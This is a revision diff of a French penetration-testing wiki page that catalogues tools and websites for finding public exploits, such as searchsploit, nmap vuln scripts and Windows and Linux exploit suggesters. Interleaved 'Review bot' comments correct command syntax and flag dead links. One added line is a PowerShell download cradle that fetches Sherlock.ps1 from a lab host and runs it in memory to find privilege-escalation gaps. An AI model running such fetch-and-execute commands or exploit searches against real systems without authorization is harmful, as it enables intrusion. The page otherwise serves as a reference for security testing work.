trouver_des_exploits_publique

Differences

This page shows the differences between the selected revision and the current version of the page.


trouver_des_exploits_publique [2020/06/02 10:52]
M0N5T3R
trouver_des_exploits_publique [2023/10/01 22:32] (current version)
M0N5T3R
 Line 6: Line 6:
 ============================= =============================
  
 +
 +**offline :**
 +
 +  * un outil comme searchsploit mais qui cherche sur exploit-db et https://github.com/nomi-sec/PoC-in-GitHub : https://github.com/usdAG/search_vulns 
   * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf   * SearchSploit https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
   * -> git clone https://github.com/offensive-security/exploit-database.git   * -> git clone https://github.com/offensive-security/exploit-database.git
   * -> apt update && apt -y install exploitdb   * -> apt update && apt -y install exploitdb
   * -> searchsploit -u #update   * -> searchsploit -u #update
-  * -> searchsploit "linux Kernel" #Example+  * -> searchsploit "linux Kernel"--exclude="(PoC)|/dos/" #Example
   * -> searchsploit apache mod_ssl #Other example   * -> searchsploit apache mod_ssl #Other example
   * -> searchsploit -m 7618 #Paste the exploit in current directory   * -> searchsploit -m 7618 #Paste the exploit in current directory
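Review bot: the new example searchsploit "linux Kernel"--exclude="(PoC)|/dos/" is missing the space before --exclude, so the shell hands searchsploit a single search term "linux Kernel--exclude=(PoC)|/dos/" and the exclusion never applies; write it as searchsploit "linux Kernel" --exclude="(PoC)|/dos/". The comment on searchsploit -m 7618 ("Paste the exploit in current directory") would read more accurately as "Mirror (copy) the exploit into the current directory", which is what -m does.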
 Line 16: Line 20:
   * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit   * -> searchsploit -x 7618[.c] #Open vi to inspect the exploit
   * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result   * -> searchsploit --nmap file.xml #Search vulns inside an nmap xml result
 +  * -> searchsploit openssh 3 --color| grep -i 'openssh 3.' #This example filter the result 
 +  * -> nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml
 +  * -> searchsploit -x --nmap resultat.xml
 +
 +
  
   * MSF-Search   * MSF-Search
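Review bot: the added scan nmap --min-rate 200 -p- 10.10.10.93 -oX resultat.xml runs without -sV, so the XML carries no service names or versions and searchsploit --nmap, which builds its searches from the version fields of each port, has almost nothing to match on; use nmap -sV --min-rate 200 -p- 10.10.10.93 -oX resultat.xml, as the earlier --nmap bullet on this page assumes. In the openssh example, forcing --color before a pipe puts ANSI escape sequences into the output, which may keep grep -i 'openssh 3.' from matching the highlighted text; drop --color when piping into grep.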
 Line 21: Line 30:
  
   * Nmap vulners   * Nmap vulners
-  * nmap --script nmap-vulners -sV 127.0.0.1 -p 443+  * -> nmap --script nmap-vulners -sV 127.0.0.1 -p 443
  
 +
 +  * Nmap vuln
 +  * -> nmap -Pn -n -sV -oN vulnnmapoutput.txt --script vuln 127.0.0.1
 +
 +  * Sherlock , PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
 +  * -> https://github.com/rasta-mouse/Sherlock
 +  * -> powershell "IEX(New-Object Net.Webclient).downloadString('http://10.10.14.13:3001/Sherlock.ps1'); Find-AllVulns"
 +  * ->  attend quelque minutes
 +
 +
 +  * Windows Exploit Suggester 
 +  * -> git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
 +  * -> pip install xlrd --upgrade
 +  * -> apt install python3-xlrd
 +  * -> ./windows-exploit-suggester.py --update
 +  * -> python windows-exploit-suggester.py --database 2020-07-27-mssb.xls --systeminfo sysinfo.txt
 +
 +
 +
 +  * Windows Exploit Suggester - Next Generation (WES-NG)
 +  * -> git clone https://github.com/bitsadmin/wesng.git
 +  * -> python wes.py --update
 +  * -> python wes.py sysinfoTarget.txt 
 +  * List only vulnerabilities with exploits, excluding IE, Edge and Flash
 +  * -> wes.py systeminfo.txt --exploits-only --hide "Internet Explorer" Edge Flash
 +  * -> wes.py systeminfo.txt -e --hide "Internet Explorer" Edge Flash
 +  * Only show vulnerabilities of a certain impact
 +  * -> wes.py systeminfo.txt - -impact "Remote Code Execution" 
 +  * -> wes.py systeminfo.txt -i "Remote Code Execution"
 +  * -> wes.py systeminfo.txt -i "Elevation of Privilege"
 +  * Only show vulnerabilities of a certain severity
 +  * -> wes.py systeminfo.txt --severity critical important
 +  * -> wes.py systeminfo.txt -s critical
 +
 +
 +  * Linux Exploit Suggester 2
 +  * -> git clone https://github.com/jondonas/linux-exploit-suggester-2
 +
 +  * LES: Linux privilege escalation auditing tool
 +  * -> git clone https://github.com/mzet-/linux-exploit-suggester
 +
 +
 +
 +**online :**
 +
 +  * https://cn-sec.com/?s=CVE
 +  * https://snyk.io/vuln
 +  * http://www.securityfocus.com/
 +  * https://www.cvedetails.com/
 +  * https://www.exploit-db.com/
 +  * https://www.exploit-db.com/google-hacking-database/
 +  * google
 +  * -> firefox --search "Microsoft Edge site:exploit-db.com"
 +  * -> firefox --search "Microsoft Edge site:exploit-db.com" inurl:exploits intext:remote intitle:Browser
   * https://srcincite.io/exploits/   * https://srcincite.io/exploits/
   * https://www.exploitalert.com/   * https://www.exploitalert.com/
   * https://github.com/qazbnm456/awesome-cve-poc    * https://github.com/qazbnm456/awesome-cve-poc 
   * https://github.com/yeahhub/awesome-cve-poc   * https://github.com/yeahhub/awesome-cve-poc
-  * https://www.exploit-db.com/ 
-  * https://www.exploit-db.com/google-hacking-database/ 
   * https://vulners.com/   * https://vulners.com/
   * https://sploitus.com/   * https://sploitus.com/
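Review bot: the WES-NG line wes.py systeminfo.txt - -impact "Remote Code Execution" has a stray space inside the option (- -impact), so it is not parsed as --impact; the correct long form is --impact, matching the -i short form on the next line. Two smaller points in the same block: the NSE script from the nmap-vulners repository is named vulners (vulners.nse), so --script nmap-vulners only works if the cloned directory was dropped into Nmap's scripts directory under that name, otherwise use --script vulners; and the Sherlock step "attend quelque minutes" should be in English like the rest of the list ("wait a few minutes").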
 Line 39: Line 100:
   * -> https://pastebeen.com     * -> https://pastebeen.com  
   * -> https://psbdmp.cc/ https://psbdmp.ws/    * -> https://psbdmp.cc/ https://psbdmp.ws/ 
-  * https://www.cvedetails.com/ 
-  * https://google/ 
   * Tor    * Tor 
   * -> http://xmh57jrzrnw6insl.onion/   * -> http://xmh57jrzrnw6insl.onion/
   * -> http://hss3uro2hsxfogfq.onion/   * -> http://hss3uro2hsxfogfq.onion/
   * -> http://gjobqjj7wyczbqie.onion/   * -> http://gjobqjj7wyczbqie.onion/
-  * -> Ahmia.fi+  * -> https://ahmia.fi/
   * https://threatpost.com/   * https://threatpost.com/
   * https://www.deepdotweb.com/   * https://www.deepdotweb.com/
   * https://packetstormsecurity.com/   * https://packetstormsecurity.com/
-  * https://www.cvedetails.com/ 
   * http://routerpwn.com/   * http://routerpwn.com/
   * https://www.rapid7.com/db/   * https://www.rapid7.com/db/
-  * http://0day.today/+  * http://0day.today/ **non recommandé** [[https://forum.zenk-security.com/showthread.php?tid=2590|thread sur le forum]]
   * https://cve.mitre.org/cve/   * https://cve.mitre.org/cve/
   * http://www.exploitalert.com   * http://www.exploitalert.com
   * http://www.vulnerability-lab.com   * http://www.vulnerability-lab.com
-  * https://packetstormsecurity.com 
   * https://www.rapid7.com/db/   * https://www.rapid7.com/db/
   * http://it.0day.today   * http://it.0day.today
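Review bot: the three Tor links (xmh57jrzrnw6insl.onion, hss3uro2hsxfogfq.onion, gjobqjj7wyczbqie.onion) are 16-character v2 onion addresses; Tor removed v2 onion service support in 2021, so they no longer resolve and should be replaced with v3 addresses or dropped, leaving https://ahmia.fi/ as the only working entry of that group. Also, 0day.today is flagged **non recommandé** with a link to the forum thread, but http://it.0day.today, the same site, stays listed a few lines further down without the warning; apply the same note there or remove that entry.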
 Line 64: Line 121:
   * https://www.kb.cert.org/vuls   * https://www.kb.cert.org/vuls
   * https://secunia.com/community/advisories/search/   * https://secunia.com/community/advisories/search/
-  * http://www.securityfocus.com/bid 
   * http://lwn.net/Vulnerabilities/   * http://lwn.net/Vulnerabilities/
   * https://www.owasp.org/index.php/Category:Vulnerability   * https://www.owasp.org/index.php/Category:Vulnerability
 Line 73: Line 129:
   * http://www.intelligentexploit.com   * http://www.intelligentexploit.com
   * http://osvdb.org/   * http://osvdb.org/
-  * http://www.securityfocus.com/ 
-  * http://packetstormsecurity.com/  
   * https://wpvulndb.com/    * https://wpvulndb.com/ 
   * http://repwn.com/wiki.html   * http://repwn.com/wiki.html
   * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.   * https://www.vulncode-db.com/ Vulncode-DB - is a database for vulnerabilities and their corresponding source code if available.
   * https://cveapi.com/ cveapi - free API for CVE data.   * https://cveapi.com/ cveapi - free API for CVE data.
 +  * http://securityvulns.com/
 +  * http://insecure.org/sploits_all.html
 +  * http://zerodayinitiative.com/advisories/published/
 +  * http://nmrc.org/pub/index.html
 +  * http://oval.mitre.org
  
  
- +**Finding more information regarding the exploit ** 
-**Write-up :** +  * http://www.cvedetails.com 
-  * https://github.com/ENOFLAG/writeups?files=1 +  * http://packetstormsecurity.org/files/cve/[CVE] 
-  * Writeup de bug bounty : https://bugbountypoc.com/ +  * http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] 
-  * Writeup de bug bounty : https://pentester.land/list-of-bug-bounty-writeups.html +  * http://www.vulnview.com/cve-details.php?cvename=[CVE]
-  * Writeup de bug bounty : https://medium.com/bugbountywriteup+
-  * Writeup de bug bounty : https://pentester.land/list-of-bug-bounty-writeups. +
-  * Writeup de bug bounty : https://github.com/djadmin/awesome-bug-bounty +
-  * Writeup de HackTheBox : https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA +
-  * Writeup de HackTheBox : https://github.com/Hackplayers/hackthebox-writeups +
-  * Writeup de HackTheBox : https://veteransec.com/category/hack-the-box-write-ups/ +
-  * Writeup de HackTheBox : https://www.youtube.com/watch?v=mEKRKgbodyA&list=PLESA5tKaGeu6WYcnVHDENsr2S6d_14HNX +
-  * Writeup de hackthebox de VM retired https://0xdf.gitlab.io/ +
-  * Writeup de VulnHub :https://www.youtube.com/watch?v=7nk3xdWTnpI&list=PLESA5tKaGeu7u0uGn1yJ9IPx99l-JnKlx +
-  +
  
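Review bot: the whole Write-up section (bug-bounty write-ups such as https://pentester.land/list-of-bug-bounty-writeups.html and HackTheBox write-ups such as https://0xdf.gitlab.io/) is deleted and replaced only by the CVE lookup templates; if the write-ups moved to another page, link it here, otherwise restore them, since nothing else on the page covers them. In the new block, http://www.cvedetails.com duplicates the entry already added under **online**, and http://osvdb.org/ in the same hunk has been offline since 2016 and should be dropped.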
trouver_des_exploits_publique.1591087956.txt.gz · Last modified: 2020/06/02 10:52 by M0N5T3R